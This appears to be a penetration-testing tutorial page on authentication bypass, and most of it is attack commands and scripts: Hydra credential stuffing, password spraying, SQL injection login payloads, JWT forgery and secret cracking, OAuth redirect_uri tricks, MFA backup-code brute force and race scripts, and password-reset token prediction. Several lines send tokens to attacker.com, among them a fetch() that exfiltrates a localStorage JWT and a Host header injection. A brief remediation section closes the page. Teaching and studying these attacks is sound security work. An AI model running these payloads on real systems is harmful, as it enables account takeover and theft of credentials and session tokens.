Authentication Bypass: Breaking Login Mechanisms
Authentication vulnerabilities including credential attacks, session management flaws, MFA bypass, and OAuth vulnerabilities.
Jan 13, 2026
Updated Dec 11, 2025
2 min read
AuthenticationAuthorizationWeb SecuritySession ManagementOAuthMFA BypassPenetration TestingBug Bounty
Introduction
Authentication bypass vulnerabilities allow attackers to access accounts or functionality without proper credentials. These flaws range from simple logic errors to complex cryptographic weaknesses, representing some of the highest-impact bugs in web security.
Authentication mechanisms have evolved significantly with MFA, OAuth, and passwordless options, but each new layer introduces potential vulnerabilities that penetration testers must understand.
Password-Based Authentication Attacks
Credential Stuffing
Using breached credential databases:
# Using Hydra
hydra -L users.txt -P passwords.txt target.com http-post-form \
"/login:username=^USER^&password=^PASS^:Invalid credentials"
# Using Burp Intruder with credential lists
# Position: username=§user§&password=§pass§
# Attack type: PitchforkPassword Spraying
Test common passwords across many accounts:
# Common passwords to try
Password123!
Summer2025!
Company123
Welcome1
# Using spray tool
spray.py -u users.txt -p 'Summer2025!' -d target.comUsername Enumeration
Identify valid usernames through response differences:
# Response differences to check:
# - Different error messages
# - Response time variations
# - Different HTTP status codes
# - Account lockout for valid users only
import requests
import time
def enumerate_users(wordlist):
for username in wordlist:
start = time.time()
r = requests.post('https://target.com/login',
data={'username': username, 'password': 'invalid'})
elapsed = time.time() - start
if "Invalid password" in r.text: # Different from "Invalid username"
print(f"[VALID] {username}")
elif elapsed > 1: # Timing difference
print(f"[POSSIBLE] {username} (slow response)")Logic Flaws
Response Manipulation
Modify server responses to bypass checks:
# Original response
HTTP/1.1 200 OK
{"authenticated": false, "error": "Invalid password"}
# Modified response (intercept and change)
HTTP/1.1 200 OK
{"authenticated": true, "user": "admin"}Parameter Manipulation
# Try adding/modifying parameters
POST /login
username=user&password=wrong&admin=true
username=user&password=wrong&role=administrator
username=user&password=wrong&authenticated=1Default Credentials
Always test common defaults:
| Application | Username | Password |
|---|---|---|
| Admin panels | admin | admin, password, admin123 |
| Tomcat | tomcat | tomcat, s3cret |
| Jenkins | admin | admin |
| Databases | sa, root | (blank), password |
SQL Injection Auth Bypass
# Username field
admin'--
admin' OR '1'='1'--
' OR 1=1--
' OR ''='
admin')--
# Password field (if checked separately)
' OR '1'='1
anything' OR '1'='1'--Session Management Flaws
Predictable Session Tokens
Analyze token patterns:
# Collect multiple tokens
tokens = [
"session=MTY3ODkwMTIzNA==", # Base64 timestamp?
"session=MTY3ODkwMTIzNQ==",
"session=MTY3ODkwMTIzNg==",
]
# Decode and analyze
import base64
for t in tokens:
decoded = base64.b64decode(t.split('=')[1])
print(decoded) # Sequential numbers!Session Fixation
Force victim to use attacker-controlled session:
1. Attacker gets session: PHPSESSID=attacker123
2. Send link: https://target.com/login?PHPSESSID=attacker123
3. Victim logs in with pre-set session
4. Attacker uses same session IDInsecure Token Storage
// Check for tokens in:
localStorage.getItem('token')
sessionStorage.getItem('token')
document.cookie // Without HttpOnly
// XSS can steal these tokens
fetch('https://attacker.com/steal?token=' + localStorage.getItem('jwt'))JWT Vulnerabilities
Algorithm Confusion
Change algorithm to 'none':
import jwt
import base64
# Original token
token = "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature"
# Create token with alg:none
header = base64.urlsafe_b64encode(b'{"alg":"none","typ":"JWT"}').rstrip(b'=')
payload = base64.urlsafe_b64encode(b'{"user":"admin","role":"admin"}').rstrip(b'=')
forged = header.decode() + '.' + payload.decode() + '.'RS256 to HS256 Confusion
If server has public key exposed:
import jwt
# Get public key (often in /jwks.json or /.well-known/jwks.json)
public_key = open('public.pem').read()
# Sign with public key as HMAC secret
forged = jwt.encode(
{"user": "admin", "role": "admin"},
public_key,
algorithm="HS256"
)Weak Secret Keys
# Crack JWT secret
hashcat -a 0 -m 16500 jwt.txt wordlist.txt
# Common weak secrets
secret
password
your-256-bit-secretJWK Injection
Inject attacker's key in token header:
{
"alg": "RS256",
"typ": "JWT",
"jwk": {
"kty": "RSA",
"n": "attacker_public_key_n",
"e": "AQAB"
}
}OAuth/OIDC Vulnerabilities
Open Redirect in redirect_uri
https://target.com/oauth/authorize?
client_id=legit&
redirect_uri=https://attacker.com/steal&
response_type=code
# Variations to try:
redirect_uri=https://attacker.com
redirect_uri=https://target.com.attacker.com
redirect_uri=https://target.com%40attacker.com
redirect_uri=https://target.com/callback?next=https://attacker.com
redirect_uri=https://target.com/callback/../../../attacker.comCSRF in OAuth Flow
Missing state parameter allows login CSRF:
1. Attacker starts OAuth flow
2. Gets authorization code for attacker account
3. Sends link with code to victim
4. Victim clicks, their account links to attacker's Google/GitHubToken Leakage
# Token in URL (leaks via Referer)
https://app.com/callback#access_token=secret123
# Add external resource to page
<img src="https://attacker.com/log">
# Referer header contains token!MFA Bypass Techniques
Direct Endpoint Access
# Skip MFA page, go directly to authenticated page
GET /dashboard HTTP/1.1
Cookie: session=authenticated_session
# Sometimes MFA check only on /mfa-verify endpointResponse Manipulation
# Original MFA response
{"mfa_required": true, "redirect": "/mfa-verify"}
# Modified
{"mfa_required": false, "redirect": "/dashboard"}Backup Code Brute Force
# If backup codes are 6-8 digits
for code in range(10000000):
r = requests.post('/mfa/backup',
data={'code': str(code).zfill(8)})
if 'success' in r.text:
print(f"Valid code: {code}")
breakRace Conditions
# Submit correct and incorrect MFA simultaneously
import threading
def submit_correct():
requests.post('/mfa', data={'code': '123456'}) # correct
def submit_wrong():
requests.post('/mfa', data={'code': '000000'}) # wrong
# Race to bypass rate limiting
threads = [threading.Thread(target=submit_correct) for _ in range(10)]
threads += [threading.Thread(target=submit_wrong) for _ in range(10)]
for t in threads:
t.start()Password Reset Flaws
Token Leakage
# Token in URL sent via HTTP
http://target.com/reset?token=abc123
# Referer leakage
<img src="https://attacker.com/log">Host Header Injection
POST /forgot-password HTTP/1.1
Host: attacker.com
X-Forwarded-Host: attacker.com
[email protected]
# Reset link sent: https://attacker.com/reset?token=...Predictable Tokens
# Tokens based on:
# - Timestamp
# - User ID
# - Email hash
# - Sequential numbers
import hashlib
import time
# If token = MD5(email + timestamp)
for ts in range(int(time.time()) - 3600, int(time.time())):
token = hashlib.md5(f"[email protected]{ts}".encode()).hexdigest()
r = requests.get(f"https://target.com/reset?token={token}")
if "New password" in r.text:
print(f"Valid token: {token}")Remediation
Secure Password Storage
import bcrypt
# Hash passwords
hashed = bcrypt.hashpw(password.encode(), bcrypt.gensalt(12))
# Verify
bcrypt.checkpw(provided.encode(), stored_hash)Secure Session Management
import secrets
# Generate unpredictable tokens
session_id = secrets.token_hex(32)
# Regenerate after login
session.regenerate()
# Set secure cookie flags
response.set_cookie('session', session_id,
httponly=True, secure=True, samesite='Strict')Rate Limiting
from flask_limiter import Limiter
@limiter.limit("5 per minute")
@app.route('/login', methods=['POST'])
def login():
# ...References
MITRE ATT&CK Techniques
- T1110 - Brute Force - Credential attacks
- T1110.001 - Brute Force: Password Guessing - Password spraying
- T1110.004 - Brute Force: Credential Stuffing - Credential reuse attacks
- T1539 - Steal Web Session Cookie - Session hijacking
- T1078 - Valid Accounts - Account compromise
Common Weakness Enumeration
- CWE-287 - Improper Authentication - Primary authentication weakness
- CWE-384 - Session Fixation - Session management flaw
- CWE-307 - Improper Restriction of Excessive Authentication Attempts - Brute force vulnerability
- CWE-640 - Weak Password Recovery Mechanism for Forgotten Password - Password reset flaws
OWASP Resources
- OWASP Authentication Cheat Sheet - Authentication guidance
- OWASP Session Management Cheat Sheet - Session security
- OWASP Testing Guide - Authentication - Testing methodology
Tools Documentation
Related Articles
- SQL Injection - SQLi for auth bypass
- CSRF - Session-related attacks
- API Security - API authentication
Last updated on
Web Application Security
Comprehensive web application vulnerabilities including SQL injection, XSS, CSRF, authentication bypass, information disclosure, and business logic flaws for penetration testing and security assessments.
Cross-Site Request Forgery (CSRF): Exploitation and Defense
CSRF attacks including token bypass techniques, exploitation methods, and modern defense mechanisms for web application security.